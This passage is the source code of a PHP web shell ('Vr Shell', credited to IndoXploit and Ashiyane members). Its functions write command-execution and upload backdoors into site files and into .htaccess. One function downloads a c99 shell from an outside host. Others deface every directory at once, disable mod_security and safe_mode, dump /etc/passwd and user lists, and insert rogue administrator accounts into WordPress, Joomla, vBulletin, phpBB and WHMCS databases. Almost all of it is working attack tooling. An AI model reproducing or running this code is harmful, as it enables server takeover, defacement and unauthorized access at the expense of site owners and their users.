  1343. echo $list.'</ul>';
  1344.  
  1345. ?>
  1346.  
  1347. <hr />
  1348. <br />
  1349. <?php
  1350.  
  1351. if(isset($_GET["bd"])){
  1352.    
  1353.     $bd = $_GET["bd"];
  1354.  
  1355.     if($bd=="up"){
  1356.        
  1357.         echo "<form method=\"post\" action=\"?action=backdoor&submit=get&go=up&dir=$path\"><span>Enter Filename create backdoor: </span><br /><input type=\"text\" name=\"filename\"><input type=\"submit\" value=\"Get Backdoor\"></form>";
  1358.         ?>
  1359. <br />
  1360. <b><span>Note: This Just Make an uploader not hidden.</span></b>
  1361. <?php
  1362.     }
  1363.    
  1364.     if($bd=="ur"){
  1365.        
  1366.     echo "<form method=\"post\" action=\"?action=backdoor&submit=get&go=ur&dir=$path\"><span>Enter Filename to add backdoor: </span><br /><input type=\"text\" name=\"filename\"><input type=\"submit\" value=\"Get Backdoor\"></form>";
  1367.         ?>
  1368. <br />
  1369. <b><span>How to use ?</span></b>
  1370. <p>to use : "site.com/[path]/[file].php?cmd=shell"</p>
  1371. <?php
  1372.        
  1373.     }
  1374.     if($bd=="cs"){
  1375.    
  1376.         echo "<form method=\"post\" action=\"?action=backdoor&submit=get&go=cs&dir=$path\"><span>Enter Filename to add backdoor: </span><br /><input type=\"text\" name=\"filename\"><input type=\"submit\" value=\"Get Backdoor\"></form>";
  1377.         ?>
  1378. <br />
  1379. <b><span>How to use ?</span></b>
  1380. <p>to use : "site.com/[path]/[file].php?cmd=[command]"</p>
  1381. <?php
  1382.     }
  1383.                
  1384.    
  1385.    
  1386.     if($bd=="ht"){
  1387.                
  1388.        
  1389.         echo "<form method=\"post\" action=\"?action=backdoor&submit=get&go=ht&dir=$path\"><input type=\"submit\" value=\"Get htaccess Backdoor\"></form>";
  1390.        
  1391.         ?>
  1392. <br />
  1393. <b><span>How to use ?</span></b>
  1394. <p>to use : "site.com/[path]/.htaccess?cmd=[command]"</p>
  1395. <?php
  1396.        
  1397.     }
  1398.    
  1399.    
  1400.    
  1401.    
  1402. }
  1403.  
  1404. if(isset($_GET["action"]) && $_GET["action"]=="backdoor" && isset($_GET["submit"])=="get" && isset($_GET["go"]) && $_GET["go"]!=""){
  1405.    
  1406.     $action=htmlspecialchars($_GET["go"]);
  1407.    
  1408.    
  1409.     if($action=="up"){
  1410.        
  1411.         $code='<?php
  1412. if (isset($_FILES["userfile"])) {
  1413. $dir=$_POST["dir"];
  1414. if($dir == "" || !isset($dir)) $dir=getcwd();
  1415.  
  1416.  
  1417. $uploadfile=$dir."/".basename($_FILES["userfile"]["name"]);
  1418.  
  1419. if (move_uploaded_file($_FILES["userfile"]["tmp_name"],$uploadfile)) {
  1420. echo "Uploaded: ".
  1421. "Name: ".$_FILES["userfile"]["name"]."<br>\n".
  1422. "Type: ".$_FILES["userfile"]["type"]."<br>\n".
  1423. "Size: ".$_FILES["userfile"]["size"]." bytes<br>\n";
  1424. }
  1425. else print "Error uploading file: ".$_FILES["userfile"]["name"]."";
  1426. echo "<hr>";
  1427. }
  1428. ?>
  1429.  
  1430. <form enctype="multipart/form-data" method="POST">
  1431. Upload New File
  1432. <br /><input type="file" name="userfile"/>
  1433. <br /><input type="submit" value="Upload"/>
  1434. </form>';
  1435.         $filename = htmlspecialchars($_POST["filename"]);
  1436.        
  1437.         $fp=fopen($filename,'a');
  1438.         $res = fwrite($fp , $code);
  1439.         fclose($fp);
  1440.        
  1441.         if($res){
  1442.            
  1443.             echo "<span style='color:green'>ok</span>";
  1444.         }else{
  1445.             echo "<span style='color:red'>cant write</span>";
  1446.         }
  1447.     }
  1448.    
  1449.     if($action=="ur"){
  1450.        
  1451.         $code = '<?php
  1452. //Code By Mahdi.Hidden ~ Ashiyane Digital Security Team
  1453. if(isset($_GET["cmd"]) && $_GET["cmd"]=="shell"){
  1454. if(file_put_contents("shell.php", file_get_contents("http://www.sh3ll.org/c99.txt"))){
  1455. echo "OK";
  1456. } else {
  1457. echo "File Cant Be Create";
  1458. }
  1459. }
  1460. //Code By Mahdi.Hidden ~ Ashiyane Digital Security Team
  1461. ?>';
  1462.         $filename = htmlspecialchars($_POST["filename"]);
  1463.        
  1464.        
  1465.         $fp=fopen($filename,'a');
  1466.         $res = fwrite($fp , $code);
  1467.         fclose($fp);
  1468.        
  1469.         if($res){
  1470.            
  1471.             echo "<span style='color:green'>ok</span>";
  1472.         }else{
  1473.             echo "<span style='color:red'>cant be write</span>";
  1474.         }
  1475.     }
  1476.    
  1477.     if($action=="ht"){
  1478.        
  1479.         $code = '<Files ~ "^\.ht">
  1480. Order allow,deny
  1481. Allow from all
  1482. </Files>
  1483. AddType application/x-httpd-php .htaccess
  1484. # <?php passthru($_GET["cmd"]); ?>';
  1485.  
  1486.         $filename = ".htaccess";
  1487.         $fp=fopen($filename,'a');
  1488.         $res = fwrite($fp , $code);
  1489.         fclose($fp);
  1490.        
  1491.         if($res){
  1492.            
  1493.             echo "<span style='color:green'>ok</span>";
  1494.         }else{
  1495.             echo "<span style='color:red'>cant be write</span>";
  1496.         }
  1497.  
  1498.        
  1499.        
  1500.        
  1501.     }
  1502.     if($action=="cs"){
  1503.        
  1504.             $code = '<?php passthru($_GET["cmd"]); ?>';
  1505.  
  1506.         $filename = htmlspecialchars($_POST["filename"]);
  1507.         $fp=fopen($filename,'a');
  1508.         $res = fwrite($fp , $code);
  1509.         fclose($fp);
  1510.        
  1511.         if($res){
  1512.            
  1513.             echo "<span style='color:green'>ok</span>";
  1514.         }else{
  1515.             echo "<span style='color:red'>cant be write</span>";
  1516.         }
  1517.        
  1518.     }
  1519.    
  1520. }
  1521.  
  1522.  
  1523.  
  1524.  
  1525.  
  1526. ?>
  1527. </div>
  1528.        
  1529.         <?php
  1530.     }
  1531.    
  1532.     if($action=="mass"){
  1533.         ?>
  1534.        
  1535. <br />
  1536.  
  1537. Mass Defacement:</td><br>
  1538. <form action='?action=mass&submit=mass&dir=<?php echo $path ?>' method='post'>
  1539. Directory: <input type='text' style='width: 700px' value='<?php echo getcwd() . "/"; ?>' name='massdefacedir'>
  1540. <br/>Url Deface Deface Page <input type='text' style='width: 675px' name='massdefaceurl' value=''>
  1541. <br/>Name File <input type='text' style='width: 735px' name='filename' value='mahdi.hidden.html'>
  1542. <input type='submit' name='execmassdeface' value='Kill It'></form></td>  
  1543.        
  1544.         <?php
  1545.        
  1546. if(isset($_REQUEST['submit']) && $_REQUEST['submit']=="mass"){
  1547. echo "<br><span style='margin-left:0px'>Results: </span><br><center><textarea placeholder='Results will be here..' rows='15' cols='100'>";
  1548. $defaceurl = htmlspecialchars($_POST['massdefaceurl']);
  1549. $dir = htmlspecialchars($_POST['massdefacedir']);
  1550. $filename = htmlspecialchars($_POST['filename']);
  1551. echo $dir."\n";
  1552. if (is_dir($dir)) {
  1553. if ($dh = opendir($dir)) {
  1554. while (($file = readdir($dh)) !== false) {
  1555. if(filetype($dir.$file)=="dir"){
  1556. $newfile=$dir.$file."/".$filename;
  1557. echo $newfile."\n";
  1558. if (!copy($defaceurl, $newfile)) {
  1559. echo "failed to copy $file...\n";
  1560. }
  1561. }
  1562. }
  1563. closedir($dh);
  1564. }
  1565. }
  1566. echo "</textarea></center>";
  1567. }
  1568. ?>
  1569.        
  1570.         <?php
  1571.     }
  1572.    
  1573.    
  1574.     if($action=="disfunc"){
  1575.         ?>
  1576.         <br />
  1577.         <center>
  1578.         <table>
  1579.         <tr><td>
  1580.           <form action="?action=disfunc&submit=bypass&bypass=apache&dir=<?php echo $path ?>" method="post">
  1581.           <input type="submit" value="htaccess apache" />
  1582.           </form>
  1583.                    
  1584.         </td><td>
  1585.        
  1586.          <form action="?action=disfunc&submit=bypass&bypass=litespeed&dir=<?php echo $path ?>" method="post">
  1587.         <input type="submit" value="htaccess litespeed" />          
  1588.         </form>
  1589.         </td><td>
  1590.         <form action="?action=disfunc&submit=bypass&bypass=phpini&dir=<?php echo $path ?>" method="post">
  1591.         <input type="submit" value="php.ini" />          
  1592.         </form>
  1593.           </td>
  1594.           <td>
  1595.           <form action="?action=disfunc&submit=bypass&bypass=etcpasswd&dir=<?php echo $path ?>" method="post">
  1596.           <input type="submit" value="Read etc/passwd" />
  1597.           </form>
  1598.                    
  1599.         </td>
  1600.         <td>
  1601.           <form action="?action=disfunc&submit=bypass&bypass=readusers&dir=<?php echo $path ?>" method="post">
  1602.           <input type="submit" value="Read Users" />
  1603.           </form>
  1604.                    
  1605.         </td></tr>
  1606.           </table>
  1607.           </center>
  1608.           <?php
  1609.          
  1610.           if(isset($_REQUEST['submit']) && $_REQUEST['submit']=="bypass"){
  1611.              
  1612.               $bypass = $_REQUEST['bypass'];
  1613.              
  1614.               if($bypass=="apache"){
  1615.                  ?>
  1616.                  
  1617.                  <?php
  1618.                  $fil=fopen($path."/".".htaccess","w");
  1619. fwrite($fil,'#Generated By Mahdi.Hidden
  1620. <IfModule mod_security.c>
  1621. Sec------Engine Off
  1622. Sec------ScanPOST Off
  1623. </IfModule>');
  1624. fclose($fil);
  1625. echo '<script>alert("htaccess for Apache was created.");document.location.href="?action=disfunc&dir='.$path.'";</script>';
  1626.  
  1627. ?>
  1628.                  <?php
  1629.               } elseif($bypass=="phpini"){
  1630.                 ?>
  1631.                 <?php
  1632.                   $fil=fopen($path."/"."php.ini","w");
  1633. fwrite($fil,'safe_mode=OFF
  1634. disable_functions=ByPass By Mahdi.Hidden');
  1635. fclose($fil);
  1636. $file2=fopen($path."/"."ini.php","w");
  1637. fwrite($file2,'<?
  1638. echo ini_get("safe_mode");
  1639. echo ini_get("open_basedir");
  1640. include($_GET["file"]);
  1641. ini_restore("safe_mode");
  1642. ini_restore("open_basedir");
  1643. echo ini_get("safe_mode");
  1644. echo ini_get("open_basedir");
  1645. include($_GET["ss"]);
  1646. ?>');
  1647. fclose($file2);
  1648. echo '<script>alert("php.ini && ini.php was created.");document.location.href="?action=disfunc&dir='.$path.'";</script>';
  1649. ?>
  1650.  
  1651.               <?php
  1652.                  
  1653.               } elseif($bypass=="litespeed"){
  1654.                   ?>
  1655.                   <?php
  1656.                  $fil=fopen($path."/".".htaccess","w");
  1657. fwrite($fil,'#Generated By Mahdi.Hidden
  1658. <Files *.php>
  1659. ForceType application/x-httpd-php4
  1660. </Files>
  1661. ahm tas: <IfModule mod_security.c>
  1662. SecFilterEngine Off
  1663. SecFilterScanPOST Off
  1664. </IfModule>');
  1665. fclose($fil);
  1666. echo '<script>alert("htaccess for Litespeed was created.");document.location.href="?action=disfunc&dir='.$path.'";</script>';
  1667. ?>
  1668.                   <?php
  1669.                  
  1670.               } elseif($bypass=="etcpasswd"){
  1671.                           echo '<br><pre style="border:2px solid #CE3F3F;padding:5px;margin:0;overflow: auto;">';
  1672.         if(function_exists("system") || function_exists("exec") || function_exists("passthru") || function_exists("shell_exec")){
  1673.             echo extension("cat /etc/passwd");
  1674.             }
  1675.         elseif(function_exists("file_get_contents") && is_readable("/etc/passwd")){
  1676.             echo file_get_contents("/etc/passwd");
  1677.             }
  1678.         elseif(function_exists("posix_getpwuid")){
  1679.             for($uid=0;$uid<60000;$uid++){
  1680.                 $ara = @posix_getpwuid($uid);
  1681.                 if (!empty($ara)) {
  1682.                     while (list ($key, $val) = each($ara)){
  1683.                         print "$val:";
  1684.                     }print "\n";}}
  1685.         } else{echo '<script>alert("Error in bypass...")</script>';}
  1686.               } elseif($bypass=="readusers"){
  1687.                   if(!@file_exists("/etc/virtual/domainowners")){
  1688.             echo '<br><pre style="border:2px solid #CE3F3F;padding:5px;margin:0;overflow: auto;">';
  1689.             $i = 0;
  1690.             while ($i < 60000) {
  1691.                 $line = posix_getpwuid($i);
  1692.                 if (!empty($line)) {
  1693.                     while (list ($key, $vl) = each($line)){
  1694.                         echo $vl."\n";
  1695.                         break;}}$i++;}
  1696.         }else{echo '<pre style="border:2px solid #CE3F3F;padding:5px;margin:0;overflow: auto;"><br>';
  1697.             $users = @file("/etc/virtual/domainowners");
  1698.             foreach($users as $boz){
  1699.                 $user = explode(":",$boz);
  1700.                 echo trim($user[1]).'<br>';}}
  1701.               }
  1702.           }
  1703.          
  1704.           ?>
  1705.        
  1706.         <?php
  1707.     }
  1708.    
  1709.     if($action=="info"){
  1710.         ?>
  1711.        
  1712.         <br />
  1713.         <?php
  1714.         echo '<div class=phpinfo><style>.p {color:#000;}</style>';
  1715. ob_start();
  1716. phpinfo();
  1717. $tmp = ob_get_clean();
  1718. $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2, hr) {.*}!msiU','',$tmp);
  1719. $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
  1720. echo str_replace('<h1','<h2', $tmp) .'</div><br>';
  1721.         ?>
  1722.      
  1723.         <?php
  1724.         }
  1725.     if($action=="aboutus"){
  1726. echo "<style>#aboutus{background: #A81F1F}</style>";
  1727.  
  1728.         ?>
  1729.         <br />
  1730.                     <center>
  1731.         <img src="https://s17.postimg.org/er9knq4yn/idx_2_copy.png" /><br />
  1732.         <span style="color:#F00;font-size:20px">Vr Shell</span><br />
  1733.                         <span style="font-size:19px">Developed By <a target="_blank" href="http://ngalasmgl.blogspot.co.id">Itsuka VrCy</a></span><br />
  1734.  
  1735.         <span>Greetings  : nginxDEX, Magelang6etar, 1r4maDecode404, Lysteriouss, CyclosTextovert.</span><br />
  1736.         <span>Our Residence: <a href="http://www.indoxploit.or.id" target="_blank">IndoXploit Magelang</a><br />
  1737.         <span><br>IndoXploit Coders Team</span><br />
  1738.                     </center>
  1739.         <?php
  1740.     }
  1741.     if($action=="rmshell"){
  1742.         echo "<style>#rmshell{background: #A81F1F}</style>";
  1743.  
  1744.         ?>
  1745.        
  1746.         <form action="?action=rmshell" method="post">
  1747.         <span>Do You Really Want To Remove Shell?</span>
  1748.             <input type="submit" value="Yes" name="accept" style="cursor: pointer"/>
  1749.             <input type="button" value="No" onclick="window.location.href='?action=explorer'" style="cursor: pointer"/>
  1750.         </form>
  1751.        
  1752.     <?php  
  1753.     if(isset($_POST['accept']) && $_POST['accept'] != "" && $_POST['accept']=="Yes"){
  1754.  
  1755. if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
  1756. die('<b>Sheller has been removed</i> :)</b>');
  1757. else
  1758. echo 'unlink error!';
  1759.  
  1760.        
  1761.     }
  1762.    
  1763.    
  1764.     }
  1765.    
  1766.    
  1767. if($action=="pwchanger"){
  1768.  
  1769. ?>
  1770. <center>
  1771. <br>
  1772. <div class="pwchanger">
  1773. <a href="?action=pwchanger&cms=wp"><input type="button" value="Wordpress"></a>
  1774. <a href="?action=pwchanger&cms=joomla"><input type="button" value="Joomla"></a>
  1775. <a href="?action=pwchanger&cms=vb"><input type="button" value="vBulletin"></a>
  1776. <a href="?action=pwchanger&cms=whmcs"><input type="button" value="WHMCS"></a>
  1777. <a href="?action=pwchanger&cms=mybb"><input type="button" value="MyBB"></a>
  1778. <a href="?action=pwchanger&cms=phpbb"><input type="button" value="phpBB"></a>
  1779. <a href="?action=pwchanger&cms=phpnuke"><input type="button" value="phpNuke"></a>
  1780. </div>
  1781. </center>
  1782. <?php
  1783.  
  1784. if(isset($_GET['cms']) && $_GET['cms']!=""){
  1785. $cms=$_GET['cms'];
  1786. if($cms=="wp"){
  1787. ?>
  1788. <br>
  1789. <b>ADD NEW ADMIN WORDPRESS</b>
  1790. <form action="?action=pwchanger&cms=wp" method="POST">
  1791. <table>
  1792. <tr><td>Host :</td>
  1793. <td><input size="30" value="localhost" name="localhost" type="text"></td></tr>
  1794. <tr><td>Database :</td>
  1795. <td> <input size="30" value="" name="database" type="text"></td></tr>
  1796. <tr><td>Table Prefix :</td>
  1797. <td><input size="30" value="wp_" name="prefix" type="text"></td></tr>
  1798. <tr><td>Username : </td>
  1799. <td> <input size="30" value="" name="username" type="text"></td></tr>
  1800. <tr><td>Password :</td>
  1801. <td> <input size="30" value="" name="password" type="text"></td></tr>
  1802. <tr><td>Admin Username:</td>
  1803. <td><input name="admin" size="30" value="admin"></td></tr>
  1804. <tr><td>Admin Password: </td>
  1805. <td><input name="pass" size="30" value="ashiyane" disabled /></td></tr>
  1806. <tr><td><Admin Email:</td>
  1807. <td><input name="email" size="30" value="info@ashiyane.ir"></td></tr>
  1808. </table>
  1809. <input value="Change" name="submit" type="submit">
  1810. </form>
  1811.  
  1812.  
  1813. <?php  
  1814.  
  1815.  
  1816. if (isset($_POST['submit']) && $_POST['submit'] == 'Change'){
  1817.    
  1818.             $localhost = $_POST['localhost'];
  1819.             $database = $_POST['database'];
  1820.             $username = $_POST['username'];
  1821.             $password = $_POST['password'];
  1822.             $admin = $_POST['admin'];
  1823.             $email = $_POST['email'];
  1824.             $prefix = $_POST['prefix'];
  1825.             @mysql_connect($localhost,$username,$password) or die(mysql_error());
  1826.             @mysql_select_db($database) or die(mysql_error());
  1827.             $result=@mysql_query("insert into ".$prefix."users (ID,user_login,user_pass,user_email) values(null,'$admin','dfcaf717b6731a6f62baabad524a8517','$email')") or die(mysql_error());
  1828.             $result=@mysql_query("select ID from ".$prefix."users where user_login='".$admin."'") or die(mysql_error());
  1829.             $res = mysql_num_rows($result);
  1830.             if ($res == 1){
  1831.                 $resvis = mysql_fetch_assoc($result);
  1832.                 $res = $resvis['ID'];
  1833.             }
  1834.             $result=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','first_name','result')") or die(mysql_error());
  1835.             $result=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','last_name','result')") or die(mysql_error());
  1836.             $result=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','nickname','result')") or die(mysql_error());
  1837.             $result=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','description','result')") or die(mysql_error());
  1838.             $result=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','rich_editing','true')") or die(mysql_error());
  1839.             $result=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','comment_shortcuts','false')") or die(mysql_error());
  1840.             $result=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','admin_color','fresh')") or die(mysql_error());
  1841.             $result=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','use_ssl','0')") or die(mysql_error());
  1842.             $result=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','show_admin_bar_front','true')") or die(mysql_error());
  1843.             $result=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','wp_capabilities','a:1:{s:13:\"administrator\";b:1;}')") or die(mysql_error());
  1844.             $result=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','wp_user_level','10')") or die(mysql_error());
  1845.             $result=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','dismissed_wp_pointers','wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media')") or die(mysql_error());
  1846.             $result=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','show_welcome_panel','1')") or die(mysql_error());
  1847.             $result=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','wp_dashboard_quick_press_last_post_id','3')") or die(mysql_error());
  1848.             if($result){
  1849.                 echo "<center><br><b><script>alert('".$admin." is created successfully.')</script></b></center> ";
  1850.             }
  1851.  
  1852.  
  1853.  
  1854. }
  1855.  
  1856. }
  1857.  
  1858. if($cms=="joomla"){
  1859. ?>
  1860. <br>
  1861. <b>ADD NEW ADMIN JOOMLA</b>
  1862. <form action="?action=pwchanger&cms=joomla" method="POST">
  1863. <table>
  1864. <tr><td>Host :</td>
  1865. <td><input size="30" value="localhost" name="localhost" type="text"></td></tr>
  1866. <tr><td>Database :</td>
  1867. <td> <input size="30" value="" name="database" type="text"></td></tr>
  1868. <tr><td>Table Prefix :</td>
  1869. <td><input size="30" value="jos_" name="prefix" type="text"></td></tr>
  1870. <tr><td>Username : </td>
  1871. <td> <input size="30" value="" name="username" type="text"></td></tr>
  1872. <tr><td>Password :</td>
  1873. <td> <input size="30" value="" name="password" type="text"></td></tr>
  1874. <tr><td>Admin Username:</td>
  1875. <td><input name="admin" size="30" value="admin"></td></tr>
  1876. <tr><td>Admin Password: </td>
  1877. <td><input name="pass" size="30" value="ashiyane" disabled /></td></tr>
  1878. <tr><td>Admin Email:</td>
  1879. <td><input name="email" size="30" value="info@ashiyane.ir"></td></tr>
  1880. </table>
  1881. <input value="Change" name="submit" type="submit">
  1882. </form>
  1883.  
  1884. <?php
  1885. if (isset($_POST['submit']) && $_POST['submit'] == 'Change'){
  1886.  
  1887.             $localhost = $_POST['localhost'];
  1888.             $database = $_POST['database'];
  1889.             $username = $_POST['username'];
  1890.             $password = $_POST['password'];
  1891.             $admin = $_POST['admin'];
  1892.             $email = $_POST['email'];
  1893.             $prefix = $_POST['prefix'];
  1894.             @mysql_connect($localhost,$username,$password) or die(mysql_error());
  1895.             @mysql_select_db($database) or die(mysql_error());
  1896.             $result=@mysql_query("insert into ".$prefix."users (id,name,username,email,password) values(null,'Super User','".$admin."','".$email."','dfcaf717b6731a6f62baabad524a8517')") or die(mysql_error());
  1897.             $result=@mysql_query("select id from ".$prefix."users where username='".$admin."'") or die(mysql_error());
  1898.             $res = mysql_num_rows($result);
  1899.             if ($res == 1){
  1900.                 $resvis = mysql_fetch_assoc($result);
  1901.                 $res = $resvis['id'];
  1902.             }
  1903.             $result=@mysql_query("INSERT INTO ".$prefix."user_usergroup_map (user_id,group_id) VALUES ('".$res."', '8')") or die(mysql_error());
  1904.             if($result){
  1905.                 echo "<center><br><b><script>alert('".$admin." is created successfully.')</script></b></center> "; }
  1906.            
  1907.            
  1908. }      
  1909.  
  1910. }
  1911.  
  1912. if($cms=="vb"){
  1913.     ?>
  1914.     <br>
  1915.     <b>ADD NEW ADMIN VBULLETIN</b>
  1916. <form action="?action=pwchanger&cms=vb" method="POST">
  1917. <table>
  1918. <tr><td>Host :</td>
  1919. <td><input size="30" value="localhost" name="localhost" type="text"></td></tr>
  1920. <tr><td>Database :</td>
  1921. <td> <input size="30" value="" name="database" type="text"></td></tr>
  1922. <tr><td>Table Prefix :</td>
  1923. <td><input size="30" value="" name="prefix" type="text"></td></tr>
  1924. <tr><td>Username : </td>
  1925. <td> <input size="30" value="" name="username" type="text"></td></tr>
  1926. <tr><td>Password :</td>
  1927. <td> <input size="30" value="" name="password" type="text"></td></tr>
  1928. <tr><td>Admin Username:</td>
  1929. <td><input name="admin" size="30" value="admin"></td></tr>
  1930. <tr><td>Admin Password: </td>
  1931. <td><input name="pass" size="30" value="ashiyane" disabled /></td></tr>
  1932. <tr><td>Admin Email:</td>
  1933. <td><input name="email" size="30" value="info@ashiyane.ir"></td></tr>
  1934. </table>
  1935. <input value="Change" name="submit" type="submit">
  1936. </form>
  1937. <?php
  1938.     if (isset($_POST['submit']) && $_POST['submit'] == 'Change'){
  1939.  
  1940.             $localhost = $_POST['localhost'];
  1941.             $database = $_POST['database'];
  1942.             $username = $_POST['username'];
  1943.             $password = $_POST['password'];
  1944.             $admin = $_POST['admin'];
  1945.             $email = $_POST['email'];
  1946.             $prefix = $_POST['prefix'];
  1947.             @mysql_connect($localhost,$username,$password) or die(mysql_error());
  1948.             @mysql_select_db($database) or die(mysql_error());
  1949.            
  1950.             $result=@mysql_query("insert into {$prefix}user (userid,usergroupid,username,password,salt,email) values(null,'6','$admin','efacb3b2c13f0363459bffe5d6f30631','Xw|IbGLhTQA-AwApVv>61y^(z]*<QN','$email')") or die(mysql_error());
  1951.             $result=@mysql_query("select userid from {$prefix}user where username='".$admin."'") or die(mysql_error());
  1952.             $res = mysql_num_rows($result);
  1953.             if ($res == 1){
  1954.                 $resvis = mysql_fetch_assoc($result);
  1955.                 $res = $resvis['userid'];
  1956.             }
  1957.             $result=@mysql_query("insert into {$prefix}administrator (userid,adminpermissions) values('".$res."','16744444')") or die(mysql_error());
  1958.             if($result){
  1959.                 echo "<center><br><b><script>alert('".$admin." is created successfully.')</script></b></center> "; }
  1960.     }
  1961. }
  1962.  
  1963. if($cms=="phpbb"){
  1964. ?>
  1965. <br>
  1966. <b>ADD NEW ADMIN PHPBB</b>
  1967. <form action="?action=pwchanger&cms=phpbb" method="POST">
  1968. <table>
  1969. <tr><td>Host :</td>
  1970. <td><input size="30" value="localhost" name="localhost" type="text"></td></tr>
  1971. <tr><td>Database :</td>
  1972. <td> <input size="30" value="" name="database" type="text"></td></tr>
  1973. <tr><td>Table Prefix :</td>
  1974. <td><input size="30" value="" name="prefix" type="text"></td></tr>
  1975. <tr><td>Username : </td>
  1976. <td> <input size="30" value="" name="username" type="text"></td></tr>
  1977. <tr><td>Password :</td>
  1978. <td> <input size="30" value="" name="password" type="text"></td></tr>
  1979. <tr><td>Admin Username:</td>
  1980. <td><input name="admin" size="30" value="admin"></td></tr>
  1981. <tr><td>Admin Password: </td>
  1982. <td><input name="pass" size="30" value="ashiyane" disabled /></td></tr>
  1983. <tr><td>Admin Email:</td>
  1984. <td><input name="email" size="30" value="info@ashiyane.ir"></td></tr>
  1985. </table>
  1986. <input value="Change" name="submit" type="submit">
  1987. </form>
  1988.  
  1989. <?php
  1990. if (isset($_POST['submit']) && $_POST['submit'] == 'Change'){
  1991.  
  1992.             $localhost = $_POST['localhost'];
  1993.             $database = $_POST['database'];
  1994.             $username = $_POST['username'];
  1995.             $password = $_POST['password'];
  1996.             $admin = $_POST['admin'];
  1997.             $pass = $_POST['pass'];
  1998.             $email = $_POST['email'];
  1999.             $prefix = $_POST['prefix'];
  2000.             $hash = md5($pass);
  2001.             @mysql_connect($localhost,$username,$password) or die(mysql_error());
  2002.             @mysql_select_db($database) or die(mysql_error());
  2003.             $result=@mysql_query("UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE username_clean = 'admin'") or die(mysql_error());
  2004.             $result=@mysql_query("UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE username_clean = 'admin'") or die(mysql_error());
  2005.             $result=@mysql_query("UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE user_type = 3") or die(mysql_error());
  2006.             $result=@mysql_query("UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE user_type = 3") or die(mysql_error());
  2007.             $result=@mysql_query("UPDATE ".$prefix."users SET user_email ='".$SQL."' WHERE username_clean = 'admin'") or die(mysql_error());
  2008.             if($result){
  2009.                 echo "<center><br><b><script>alert('".$admin." is created successfully.')</script></b></center> ";
  2010.                 }
  2011.  
  2012.            
  2013. }
  2014. }
  2015.  
  2016. if($cms=="whmcs"){
  2017.    
  2018.     ?>
  2019.     <br>
  2020.     <b>ADD NEW ADMIN WHMCS</b>
  2021. <form action="?action=pwchanger&cms=whmcs" method="POST">
  2022. <table>
  2023. <tr><td>Host :</td>
  2024. <td><input size="30" value="localhost" name="localhost" type="text"></td></tr>
  2025. <tr><td>Database :</td>
  2026. <td> <input size="30" value="" name="database" type="text"></td></tr>
  2027. <tr><td>Username : </td>
  2028. <td> <input size="30" value="" name="username" type="text"></td></tr>
  2029. <tr><td>Password :</td>
  2030. <td> <input size="30" value="" name="password" type="text"></td></tr>
  2031. <tr><td>Admin Username:</td>
  2032. <td><input name="admin" size="30" value="admin"></td></tr>
  2033. <tr><td>Admin Password: </td>
  2034. <td><input name="pass" size="30" value="ashiyane" disabled /></td></tr>
  2035. <tr><td>Admin Email:</td>
  2036. <td><input name="email" size="30" value="info@ashiyane.ir"></td></tr>
  2037. </table>
  2038. <input value="Change" name="submit" type="submit">
  2039. </form>
  2040.    
  2041.     <?php
  2042.     if (isset($_POST['submit']) && $_POST['submit'] == 'Change'){
  2043.    
  2044.             $localhost = $_POST['localhost'];
  2045.             $database = $_POST['database'];
  2046.             $username = $_POST['username'];
  2047.             $password = $_POST['password'];
  2048.             $admin = $_POST['admin'];
  2049.             $email = $_POST['email'];
  2050.            
  2051.             @mysql_connect($localhost,$username,$password) or die(mysql_error());
  2052.             @mysql_select_db($database) or die(mysql_error());
  2053.             $result=@mysql_query("insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','".$admin."','dfcaf717b6731a6f62baabad524a8517','".$email."','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysql_error());
  2054.             if($result){
  2055.                 echo "<center><br><b><script>alert('".$admin." is created successfully.')</script></b></center> ";
  2056.                 }
  2057.    
  2058.     }
  2059.    
  2060. }
  2061.  
  2062. if($cms=="mybb"){
  2063.  
  2064. ?>
  2065. <br>
  2066. <b>ADD NEW ADMIN MYBB</b>
  2067. <form action="?action=pwchanger&cms=mybb" method="POST">
  2068. <table>
  2069. <tr><td>Host :</td>
  2070. <td><input size="30" value="localhost" name="localhost" type="text"></td></tr>
  2071. <tr><td>Database :</td>
  2072. <td> <input size="30" value="" name="database" type="text"></td></tr>
  2073. <tr><td>Table Prefix :</td>
  2074. <td><input size="30" value="" name="prefix" type="text"></td></tr>
  2075. <tr><td>Username : </td>
  2076. <td> <input size="30" value="" name="username" type="text"></td></tr>
  2077. <tr><td>Password :</td>
  2078. <td> <input size="30" value="" name="password" type="text"></td></tr>
